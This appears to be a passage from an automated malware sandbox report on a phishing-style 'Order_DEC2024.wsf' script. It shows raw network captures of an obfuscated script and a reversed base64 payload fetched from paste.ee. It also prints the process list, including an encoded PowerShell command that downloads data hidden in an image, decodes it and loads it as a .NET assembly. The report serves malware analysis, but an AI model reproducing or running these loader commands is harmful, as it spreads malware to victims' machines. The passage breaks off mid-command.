                                                                                                                                                                                  2024-12-04 10:09:01 UTC1369INData Raw: 68 63 63 62 6e 4e 57 47 50 47 4b 20 3d 20 22 74 57 66 52 4b 63 78 63 66 47 76 52 74 7a 74 22 0d 0a 69 4c 4f 73 78 78 57 4c 41 70 41 4c 4e 7a 55 20 3d 20 22 61 74 47 4f 6c 62 75 65 65 61 72 63 64 47 42 22 0d 0a 41 57 47 70 57 57 4b 72 78 5a 4c 78 48 66 43 20 3d 20 22 69 6f 69 62 53 57 4c 42 69 5a 6d 68 69 4e 55 22 0d 0a 64 4b 70 57 4b 63 43 62 6d 6a 4c 47 73 4c 55 20 3d 20 22 74 74 41 6c 4f 63 57 55 64 63 69 47 6b 76 70 22 0d 0a 7a 63 52 61 47 4b 66 63 4f 6b 74 71 6c 70 47 20 3d 20 22 47 47 4e 50 6a 55 4c 69 66 43 65 71 4b 52 70 22 0d 0a 50 6b 7a 55 48 69 42 64 4b 57 68 6d 63 55 47 20 3d 20 22 47 57 66 74 6a 4c 4e 43 69 6b 6a 68 69 6b 41 22 0d 0a 0d 0a 57 4e 6b 62 70 6e 4e 47 50 4b 69 4c 53 4c 57 20 3d 20 22 65 61 69 55 70 4c 57 55 69 63 63 4b 68 48 68 22
                                                                                                                                                                                  Data Ascii: hccbnNWGPGK = "tWfRKcxcfGvRtzt"iLOsxxWLApALNzU = "atGOlbueearcdGB"AWGpWWKrxZLxHfC = "ioibSWLBiZmhiNU"dKpWKcCbmjLGsLU = "ttAlOcWUdciGkvp"zcRaGKfcOktqlpG = "GGNPjULifCeqKRp"PkzUHiBdKWhmcUG = "GWftjLNCikjhikA"WNkbpnNGPKiLSLW = "eaiUpLWUiccKhHh"
                                                                                                                                                                                  2024-12-04 10:09:01 UTC1369INData Raw: 57 22 0d 0a 75 64 71 7a 61 4c 57 70 4f 69 51 55 63 5a 4c 20 3d 20 22 67 4e 6b 64 4c 4c 55 50 57 4b 65 4f 57 5a 5a 22 0d 0a 66 63 69 4f 47 4c 66 6b 4e 4f 50 74 57 57 43 20 3d 20 22 70 49 66 55 5a 4c 5a 53 72 4e 42 63 7a 4c 69 22 0d 0a 41 5a 4e 47 57 4f 57 66 4c 70 57 57 6f 78 7a 20 3d 20 22 4c 63 6b 69 69 4b 48 63 57 4c 41 47 75 57 41 22 0d 0a 4c 50 4b 4c 57 62 4c 41 70 70 47 4f 54 57 70 20 3d 20 22 71 65 4c 51 57 62 63 75 6f 65 47 47 42 69 4c 22 0d 0a 4e 4c 69 63 47 62 48 6d 75 4e 6b 66 4c 51 69 20 3d 20 22 65 75 50 65 63 57 4c 78 6c 74 52 6d 55 52 43 22 0d 0a 52 57 69 5a 65 47 68 48 50 65 6e 69 55 4c 6d 20 3d 20 22 57 69 4b 70 4b 4b 57 57 61 62 57 49 72 4b 65 22 0d 0a 78 47 68 7a 6d 4b 73 69 6d 50 57 5a 63 4b 6f 20 3d 20 22 78 6d 49 41 64 69 63 75 41 6f
                                                                                                                                                                                  Data Ascii: W"udqzaLWpOiQUcZL = "gNkdLLUPWKeOWZZ"fciOGLfkNOPtWWC = "pIfUZLZSrNBczLi"AZNGWOWfLpWWoxz = "LckiiKHcWLAGuWA"LPKLWbLAppGOTWp = "qeLQWbcuoeGGBiL"NLicGbHmuNkfLQi = "euPecWLxltRmURC"RWiZeGhHPeniULm = "WiKpKKWWabWIrKe"xGhzmKsimPWZcKo = "xmIAdicuAo
                                                                                                                                                                                  2024-12-04 10:09:01 UTC1301INData Raw: 57 69 41 75 54 57 74 22 0d 0a 6e 6b 6d 61 48 4c 4f 47 6a 69 53 51 66 52 72 20 3d 20 22 43 4b 64 75 78 6e 5a 41 4e 69 4c 50 49 62 47 22 0d 0a 6e 67 70 4b 6f 74 64 6e 4c 51 48 51 63 41 54 20 3d 20 22 4c 4e 78 52 63 68 51 4b 4c 57 68 6d 5a 6e 70 22 0d 0a 48 74 62 68 4b 47 71 47 41 6d 71 43 6f 4c 4b 20 3d 20 22 57 62 63 5a 4c 61 69 4c 68 74 70 62 6c 70 54 22 0d 0a 55 69 57 66 4b 4f 50 4b 62 4c 4f 73 4f 50 4f 20 3d 20 22 66 78 4c 4b 50 4b 4e 67 47 4c 47 55 4f 4c 6c 22 0d 0a 65 69 61 47 57 74 57 71 47 71 65 69 50 4e 4e 20 3d 20 22 52 4c 42 4c 4e 55 6b 6e 4b 43 68 6e 66 57 69 22 0d 0a 63 52 4f 55 6d 6b 7a 71 72 66 6d 72 6c 6c 57 20 3d 20 22 6d 4b 50 4a 6f 41 6d 4c 6d 52 62 67 70 7a 57 22 0d 0a 4c 51 4c 78 68 76 6e 65 6e 50 4e 4b 75 4e 52 20 3d 20 22 4c 4b 47 47
                                                                                                                                                                                  Data Ascii: WiAuTWt"nkmaHLOGjiSQfRr = "CKduxnZANiLPIbG"ngpKotdnLQHQcAT = "LNxRchQKLWhmZnp"HtbhKGqGAmqCoLK = "WbcZLaiLhtpblpT"UiWfKOPKbLOsOPO = "fxLKPKNgGLGUOLl"eiaGWtWqGqeiPNN = "RLBLNUknKChnfWi"cROUmkzqrfmrllW = "mKPJoAmLmRbgpzW"LQLxhvnenPNKuNR = "LKGG


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                  1192.168.2.449739104.21.84.674437360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-12-04 10:09:25 UTC67OUTGET /r/owchf/0 HTTP/1.1
                                                                                                                                                                                  Host: paste.ee
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  2024-12-04 10:09:26 UTC1284INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Wed, 04 Dec 2024 10:09:25 GMT
                                                                                                                                                                                  Content-Type: text/plain; charset=utf-8
                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: max-age=2592000
                                                                                                                                                                                  strict-transport-security: max-age=63072000
                                                                                                                                                                                  x-frame-options: DENY
                                                                                                                                                                                  x-content-type-options: nosniff
                                                                                                                                                                                  x-xss-protection: 1; mode=block
                                                                                                                                                                                  content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                  Age: 33572
                                                                                                                                                                                  Last-Modified: Wed, 04 Dec 2024 00:49:53 GMT
                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0UWMditE7Y5yIGnwaety59WGWbqmN98383gV5APJat6qDviXgn4vhZ6kqfYZfSoP%2FRvg0f8G8iglPxf%2BZV8j6BhOP9vexQCa8TMrLdN6cQWkutpRjL8tAMghwg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                  CF-RAY: 8ecb00386f9e430d-EWR
                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                  2024-12-04 10:09:26 UTC215INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 35 37 31 26 6d 69 6e 5f 72 74 74 3d 31 35 36 33 26 72 74 74 5f 76 61 72 3d 36 30 32 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 37 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 31 37 26 72 65 63 76 5f 62 79 74 65 73 3d 36 38 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 37 39 32 35 31 30 26 63 77 6e 64 3d 32 32 35 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 33 31 31 38 66 65 62 63 65 39 32 63 38 36 38 36 26 74 73 3d 34 36 37 26 78 3d 30 22 0d 0a 0d 0a
                                                                                                                                                                                  Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1571&min_rtt=1563&rtt_var=602&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2817&recv_bytes=681&delivery_rate=1792510&cwnd=225&unsent_bytes=0&cid=3118febce92c8686&ts=467&x=0"
                                                                                                                                                                                  2024-12-04 10:09:26 UTC1239INData Raw: 37 61 39 36 0d 0a 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 2b 38 67 4e 50 38 79 44 6e 38 77 48 50 59 78 44 54 38 77 43 50 41 73 44 35 37 51 38 4f 6b 75 44 67 37 41 32 4f 38 73 44 48 36 41 76 4f 4d 72 44 72 36 77 6f 4f 73 70 44 52 36 67 69 4f 51 6f 44 43 36 51 67 4f 41 6b 44 2f 35
                                                                                                                                                                                  Data Ascii: 7a96AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwD+8gNP8yDn8wHPYxDT8wCPAsD57Q8OkuDg7A2O8sDH6AvOMrDr6woOspDR6giOQoDC6QgOAkD/5
                                                                                                                                                                                  2024-12-04 10:09:26 UTC1369INData Raw: 67 44 4f 6f 67 44 4a 34 51 78 4e 38 66 44 39 33 41 2f 4e 73 66 44 36 33 67 39 4e 55 66 44 78 33 77 36 4e 6b 65 44 6f 33 77 35 4e 59 65 44 69 33 51 34 4e 30 64 44 58 33 51 31 4e 51 64 44 54 33 77 7a 4e 34 63 44 4b 33 41 78 4e 49 63 44 42 33 41 67 4e 38 62 44 37 32 67 75 4e 59 62 44 77 32 67 72 4e 30 61 44 73 32 41 71 4e 63 61 44 6a 32 51 6e 4e 73 5a 44 61 32 67 6c 4e 55 5a 44 52 32 77 69 4e 6b 59 44 49 32 41 68 4e 4d 55 44 39 31 41 66 4e 73 58 44 36 31 41 5a 4e 49 57 44 68 41 41 51 41 6b 42 67 42 41 44 41 41 41 73 44 61 37 51 47 4d 77 41 41 41 41 41 42 41 47 41 4c 41 37 41 7a 4f 6f 6f 44 31 36 41 74 4f 41 72 44 6d 36 67 6e 4f 55 70 44 50 36 67 6a 4f 6f 6f 44 45 35 41 65 4f 49 6e 44 72 35 67 61 4f 49 6d 44 68 35 41 59 4f 38 42 41 41 41 41 44 41 47 41 49 41
                                                                                                                                                                                  Data Ascii: gDOogDJ4QxN8fD93A/NsfD63g9NUfDx3w6NkeDo3w5NYeDi3Q4N0dDX3Q1NQdDT3wzN4cDK3AxNIcDB3AgN8bD72guNYbDw2grN0aDs2AqNcaDj2QnNsZDa2glNUZDR2wiNkYDI2AhNMUD91AfNsXD61AZNIWDhAAQAkBgBADAAAsDa7QGMwAAAAABAGALA7AzOooD16AtOArDm6gnOUpDP6gjOooDE5AeOInDr5gaOImDh5AYO8BAAAADAGAIA
                                                                                                                                                                                  2024-12-04 10:09:26 UTC1369INData Raw: 74 4f 4d 72 44 78 36 77 72 4f 30 71 44 72 36 51 71 4f 63 71 44 6c 36 77 6f 4f 45 71 44 66 36 51 6e 4f 73 70 44 5a 36 77 6c 4f 55 70 44 54 36 51 6b 4f 38 6f 44 4e 36 77 69 4f 6b 6f 44 48 36 51 68 4f 4d 6f 44 42 35 77 66 4f 30 6e 44 37 35 51 65 4f 63 6e 44 31 35 77 63 4f 45 6e 44 76 35 51 62 4f 73 6d 44 70 35 77 5a 4f 55 6d 44 6a 35 51 59 4f 38 6c 44 64 35 77 57 4f 6b 6c 44 58 35 51 56 4f 4d 6c 44 52 35 77 54 4f 30 6b 44 4c 35 51 53 4f 63 6b 44 46 35 77 51 4f 45 67 44 2f 34 51 50 4f 73 6a 44 35 34 77 4e 4f 55 6a 44 7a 34 51 4d 4f 38 69 44 74 34 77 4b 4f 6b 69 44 6e 34 51 4a 4f 4d 69 44 68 34 77 48 4f 30 68 44 62 34 51 47 4f 63 68 44 56 34 77 45 4f 45 68 44 50 34 51 44 4f 73 67 44 4a 34 77 42 4f 55 67 44 44 34 51 77 4e 38 66 44 39 33 77 2b 4e 6b 66 44 33 33
                                                                                                                                                                                  Data Ascii: tOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj5QYO8lDd5wWOklDX5QVOMlDR5wTO0kDL5QSOckDF5wQOEgD/4QPOsjD54wNOUjDz4QMO8iDt4wKOkiDn4QJOMiDh4wHO0hDb4QGOchDV4wEOEhDP4QDOsgDJ4wBOUgDD4QwN8fD93w+NkfD33
                                                                                                                                                                                  2024-12-04 10:09:26 UTC1369INData Raw: 4e 77 58 44 36 31 41 65 4e 59 58 44 30 31 67 63 4e 41 58 44 75 31 41 62 4e 6f 57 44 6f 31 67 5a 4e 51 57 44 69 31 41 59 4e 34 56 44 63 31 67 57 4e 67 56 44 57 31 41 56 4e 49 56 44 51 31 67 54 4e 77 55 44 4b 31 41 53 4e 59 55 44 45 31 67 51 4e 41 51 44 2b 30 41 50 4e 6f 54 44 34 30 67 4e 4e 51 54 44 79 30 41 4d 4e 34 53 44 73 30 67 4b 4e 67 53 44 6d 30 41 4a 4e 49 53 44 67 30 67 48 4e 77 52 44 61 30 41 47 4e 59 52 44 55 30 67 45 4e 41 52 44 4f 30 41 44 4e 6f 51 44 49 30 67 42 4e 51 51 44 43 30 41 77 4d 34 50 44 38 7a 67 2b 4d 67 50 44 32 7a 41 39 4d 49 50 44 77 7a 67 37 4d 77 4f 44 71 7a 41 36 4d 59 4f 44 6b 7a 67 34 4d 41 4f 44 65 7a 41 33 4d 6f 4e 44 59 7a 67 31 4d 51 4e 44 53 7a 41 30 4d 34 4d 44 4d 7a 67 79 4d 67 4d 44 47 7a 41 78 4d 49 4d 44 41 79 67
                                                                                                                                                                                  Data Ascii: NwXD61AeNYXD01gcNAXDu1AbNoWDo1gZNQWDi1AYN4VDc1gWNgVDW1AVNIVDQ1gTNwUDK1ASNYUDE1gQNAQD+0APNoTD40gNNQTDy0AMN4SDs0gKNgSDm0AJNISDg0gHNwRDa0AGNYRDU0gENARDO0ADNoQDI0gBNQQDC0AwM4PD8zg+MgPD2zA9MIPDwzg7MwODqzA6MYODkzg4MAODezA3MoNDYzg1MQNDSzA0M4MDMzgyMgMDGzAxMIMDAyg
                                                                                                                                                                                  2024-12-04 10:09:26 UTC1369INData Raw: 30 70 44 62 36 51 6d 4f 63 70 44 56 36 77 6b 4f 45 70 44 50 36 51 6a 4f 73 6f 44 4a 36 77 68 4f 55 6f 44 44 36 51 51 4f 38 6e 44 39 35 77 65 4f 6b 6e 44 33 35 51 64 4f 4d 6e 44 78 35 77 62 4f 30 6d 44 72 35 51 61 4f 63 6d 44 6c 35 77 59 4f 45 6d 44 66 35 51 58 4f 73 6c 44 5a 35 77 56 4f 55 6c 44 54 35 51 55 4f 38 6b 44 4e 35 77 53 4f 6b 6b 44 48 35 51 52 4f 4d 6b 44 42 34 77 50 4f 30 6a 44 37 34 51 4f 4f 63 6a 44 31 34 77 4d 4f 45 6a 44 76 34 51 4c 4f 45 68 44 51 34 77 44 4f 34 67 44 4e 34 41 44 4f 73 67 44 4b 34 51 43 4f 67 67 44 48 34 67 42 4f 55 67 44 45 34 41 77 4e 38 66 44 2b 33 51 2f 4e 77 66 44 37 33 67 2b 4e 6b 66 44 34 33 77 39 4e 59 66 44 31 33 41 38 4e 38 65 44 75 33 51 37 4e 77 65 44 72 33 67 36 4e 6b 65 44 6f 33 77 35 4e 59 65 44 6c 33 41 35
                                                                                                                                                                                  Data Ascii: 0pDb6QmOcpDV6wkOEpDP6QjOsoDJ6whOUoDD6QQO8nD95weOknD35QdOMnDx5wbO0mDr5QaOcmDl5wYOEmDf5QXOslDZ5wVOUlDT5QUO8kDN5wSOkkDH5QROMkDB4wPO0jD74QOOcjD14wMOEjDv4QLOEhDQ4wDO4gDN4ADOsgDK4QCOggDH4gBOUgDE4AwN8fD+3Q/NwfD73g+NkfD43w9NYfD13A8N8eDu3Q7NweDr3g6NkeDo3w5NYeDl3A5
                                                                                                                                                                                  2024-12-04 10:09:26 UTC1369INData Raw: 42 51 42 51 41 41 41 41 38 54 30 2f 45 68 50 41 37 6a 64 2b 73 69 50 69 30 6a 74 39 30 61 50 77 30 7a 4a 38 51 4b 50 61 74 7a 59 36 4d 76 4f 2b 6d 6a 7a 35 73 62 4f 7a 67 54 2f 34 6b 53 4e 2f 51 54 35 30 51 33 4d 4e 4f 44 62 79 51 76 4d 54 4c 54 76 79 51 6f 4d 65 45 7a 37 78 55 63 4d 63 42 44 68 77 63 44 41 41 41 41 55 41 55 41 41 41 38 54 76 2f 73 36 50 69 34 44 33 39 4d 74 4f 57 6f 6a 44 36 59 51 4f 2b 6e 7a 39 34 49 7a 4e 32 66 44 35 33 49 39 4e 41 66 6a 72 32 6b 50 4e 51 4d 54 30 7a 38 37 4d 74 4f 7a 6d 7a 6b 34 4d 33 4e 54 5a 7a 4d 31 4d 42 4e 7a 4c 7a 30 78 4d 4c 49 54 2b 79 55 72 4d 68 4b 54 55 79 6f 6b 4d 50 45 54 2b 78 63 63 4d 37 47 44 6a 78 38 58 4d 42 46 44 49 78 59 52 4d 44 41 54 32 77 41 4e 4d 4a 44 7a 68 77 41 49 4d 47 42 44 4d 77 6b 42 4d
                                                                                                                                                                                  Data Ascii: BQBQAAAA8T0/EhPA7jd+siPi0jt90aPw0zJ8QKPatzY6MvO+mjz5sbOzgT/4kSN/QT50Q3MNODbyQvMTLTvyQoMeEz7xUcMcBDhwcDAAAAUAUAAA8Tv/s6Pi4D39MtOWojD6YQO+nz94IzN2fD53I9NAfjr2kPNQMT0z87MtOzmzk4M3NTZzM1MBNzLz0xMLIT+yUrMhKTUyokMPET+xccM7GDjx8XMBFDIxYRMDAT2wANMJDzhwAIMGBDMwkBM
                                                                                                                                                                                  2024-12-04 10:09:26 UTC1369INData Raw: 54 47 30 30 78 4d 4e 4e 6a 4c 7a 77 67 4d 65 4b 44 66 79 77 6d 4d 58 4a 54 54 78 77 61 4d 58 47 6a 6a 78 45 59 4d 32 46 44 49 78 67 42 4d 7a 44 7a 36 77 30 4c 4d 32 43 54 70 77 73 4a 4d 52 43 6a 69 77 73 48 4d 31 42 6a 62 77 4d 47 41 41 41 41 64 41 51 41 67 41 41 41 41 2b 63 75 50 63 37 44 66 2b 51 69 50 65 34 44 47 2b 55 51 50 33 33 7a 37 39 67 64 50 4f 33 7a 77 39 30 62 50 34 32 7a 6b 39 6f 59 50 6d 31 6a 58 39 38 52 50 58 77 6a 31 38 73 4d 50 34 78 6a 63 38 73 41 50 44 73 54 39 37 30 2b 4f 6b 76 7a 32 37 4d 39 4f 4c 76 7a 77 37 67 37 4f 6d 75 6a 6e 37 49 35 4f 4b 75 54 67 37 67 33 4f 77 74 44 61 37 41 32 4f 59 74 7a 53 37 38 7a 4f 33 6f 54 2b 36 30 73 4f 68 71 6a 65 36 51 6e 4f 75 70 44 61 36 41 6d 4f 63 70 54 55 36 49 6b 4f 32 6f 54 4a 36 6b 68 4f 48
                                                                                                                                                                                  Data Ascii: TG00xMNNjLzwgMeKDfywmMXJTTxwaMXGjjxEYM2FDIxgBMzDz6w0LM2CTpwsJMRCjiwsHM1BjbwMGAAAAdAQAgAAAA+cuPc7Df+QiPe4DG+UQP33z79gdPO3zw90bP42zk9oYPm1jX98RPXwj18sMP4xjc8sAPDsT970+Okvz27M9OLvzw7g7Omujn7I5OKuTg7g3OwtDa7A2OYtzS78zO3oT+60sOhqje6QnOupDa6AmOcpTU6IkO2oTJ6khOH
                                                                                                                                                                                  2024-12-04 10:09:26 UTC1369INData Raw: 50 30 49 43 4e 50 4d 44 36 7a 49 74 4d 65 4b 54 62 79 49 6d 4d 48 4a 7a 49 79 63 51 4d 31 44 7a 7a 77 45 4c 4d 54 43 6a 54 41 41 41 41 30 43 41 42 67 41 41 41 41 38 44 5a 2f 63 31 50 48 39 6a 4f 2b 49 6f 50 43 35 44 4d 2b 4d 69 50 59 30 44 39 39 51 63 50 33 32 54 6e 39 49 44 50 79 76 7a 54 37 6f 54 4f 39 67 44 33 34 49 46 4f 49 63 7a 38 33 6b 35 4e 47 5a 54 4f 31 73 56 4e 34 55 44 43 7a 63 50 41 41 41 41 52 41 51 41 45 41 41 41 41 34 4d 65 4e 56 57 44 65 31 59 43 4e 41 50 44 71 79 73 75 4d 79 4b 44 6a 79 41 56 4d 7a 42 54 67 77 41 46 41 41 41 41 4a 41 51 41 41 41 38 6a 73 2f 30 32 50 36 34 44 36 2b 73 72 50 4f 32 44 33 39 63 43 50 33 76 6a 70 37 38 31 4f 45 6f 6a 39 34 34 37 4e 79 62 54 58 7a 6b 38 4d 35 4d 7a 45 79 59 76 4d 45 45 6a 48 41 41 41 41 30 41
                                                                                                                                                                                  Data Ascii: P0ICNPMD6zItMeKTbyImMHJzIycQM1DzzwELMTCjTAAAA0CABgAAAA8DZ/c1PH9jO+IoPC5DM+MiPY0D99QcP32Tn9IDPyvzT7oTO9gD34IFOIcz83k5NGZTO1sVN4UDCzcPAAAARAQAEAAAA4MeNVWDe1YCNAPDqysuMyKDjyAVMzBTgwAFAAAAJAQAAA8js/02P64D6+srPO2D39cCP3vjp781OEoj9447NybTXzk8M5MzEyYvMEEjHAAAA0A
                                                                                                                                                                                  2024-12-04 10:09:26 UTC1369INData Raw: 77 38 4c 4d 35 43 7a 73 77 30 4b 4d 6f 43 6a 6f 77 77 4a 4d 57 43 54 6b 77 73 49 4d 46 43 7a 66 77 6f 48 4d 30 42 6a 62 77 67 47 4d 6a 42 54 58 77 63 46 4d 52 42 44 54 77 59 45 4d 41 42 6a 4f 77 55 44 4d 76 41 54 4b 77 4d 43 4d 65 41 44 47 77 49 42 4d 4d 41 7a 42 77 45 41 41 41 41 41 31 41 4d 41 55 41 41 41 41 2f 73 2f 50 31 2f 44 38 2f 6f 2b 50 6b 2f 6a 33 2f 6b 39 50 54 2f 54 7a 2f 63 38 50 43 2f 44 76 2f 59 37 50 77 2b 7a 71 2f 55 36 50 66 2b 54 6d 2f 51 35 50 4f 2b 44 69 2f 49 34 50 39 39 7a 64 2f 45 33 50 72 39 6a 5a 2f 41 32 50 61 39 44 56 2f 38 30 50 4a 39 7a 51 2f 30 7a 50 34 38 6a 4d 2f 77 79 50 6d 38 54 49 2f 73 78 50 56 38 7a 44 2f 6f 77 50 45 34 6a 2f 2b 67 76 50 7a 37 54 37 2b 63 75 50 68 37 44 33 2b 59 74 50 51 37 6a 79 2b 55 73 50 2f 36 54
                                                                                                                                                                                  Data Ascii: w8LM5Czsw0KMoCjowwJMWCTkwsIMFCzfwoHM0BjbwgGMjBTXwcFMRBDTwYEMABjOwUDMvATKwMCMeADGwIBMMAzBwEAAAAA1AMAUAAAA/s/P1/D8/o+Pk/j3/k9PT/Tz/c8PC/Dv/Y7Pw+zq/U6Pf+Tm/Q5PO+Di/I4P99zd/E3Pr9jZ/A2Pa9DV/80PJ9zQ/0zP48jM/wyPm8TI/sxPV8zD/owPE4j/+gvPz7T7+cuPh7D3+YtPQ7jy+UsP/6T


                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                  Start time:05:08:56
                                                                                                                                                                                  Start date:04/12/2024
                                                                                                                                                                                  Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order_DEC2024.wsf"
                                                                                                                                                                                  Imagebase:0x7ff76c130000
                                                                                                                                                                                  File size:170'496 bytes
                                                                                                                                                                                  MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                  Start time:05:09:00
                                                                                                                                                                                  Start date:04/12/2024
                                                                                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $maremma = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JG5lbmhvID0gJ2h0dHBzOi8vcmVzLmNsb3VkaW5hcnkuY29tL2R5dGZsdDYxbi9pbWFnZS91cGxvYWQvdjE3MzMxMzQ5NDcvYmtscHlzZXlldXQ0aW1wdzUwbjEuanBnICc7JGFsdm9yb3RhciA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JGNob3N0cmEgPSAkYWx2b3JvdGFyLkRvd25sb2FkRGF0YSgkbmVuaG8pOyRwZXJpZ29zYW1lbnRlID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoJGNob3N0cmEpOyRtZXhlcm90byA9ICc8PEJBU0U2NF9TVEFSVD4+JzskbHVwYW50ZSA9ICc8PEJBU0U2NF9FTkQ+Pic7JGVuY2FyZGlyID0gJHBlcmlnb3NhbWVudGUuSW5kZXhPZigkbWV4ZXJvdG8pOyRuaXN0byA9ICRwZXJpZ29zYW1lbnRlLkluZGV4T2YoJGx1cGFudGUpOyRlbmNhcmRpciAtZ2UgMCAtYW5kICRuaXN0byAtZ3QgJGVuY2FyZGlyOyRlbmNhcmRpciArPSAkbWV4ZXJvdG8uTGVuZ3RoOyRjdW5ldGEgPSAkbmlzdG8gLSAkZW5jYXJkaXI7JGF1bGljaXNtbyA9ICRwZXJpZ29zYW1lbnRlLlN1YnN0cmluZygkZW5jYXJkaXIsICRjdW5ldGEpOyRkZWJpbGl0YW1lbnRvID0gLWpvaW4gKCRhdWxpY2lzbW8uVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGF1bGljaXNtby5MZW5ndGgpXTskZWxlbWllaXJhID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkZGViaWxpdGFtZW50byk7JGxldmFkb3VyYSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGVsZW1pZWlyYSk7JGVzY290YSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRlc2NvdGEuSW52b2tlKCRudWxsLCBAKCcwL2ZoY3dvL3IvZWUuZXRzYXAvLzpzcHR0aCcsICdiaWNoYW5jcm9zJywgJ2JpY2hhbmNyb3MnLCAnYmljaGFuY3JvcycsICdNU0J1aWxkJywgJ2JpY2hhbmNyb3MnLCAnYmljaGFuY3JvcycsJ2JpY2hhbmNyb3MnLCdiaWNoYW5jcm9zJywnYmljaGFuY3JvcycsJ2JpY2hhbmNyb3MnLCdiaWNoYW5jcm9zJywnMScsJ2JpY2hhbmNyb3MnKSk7aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWx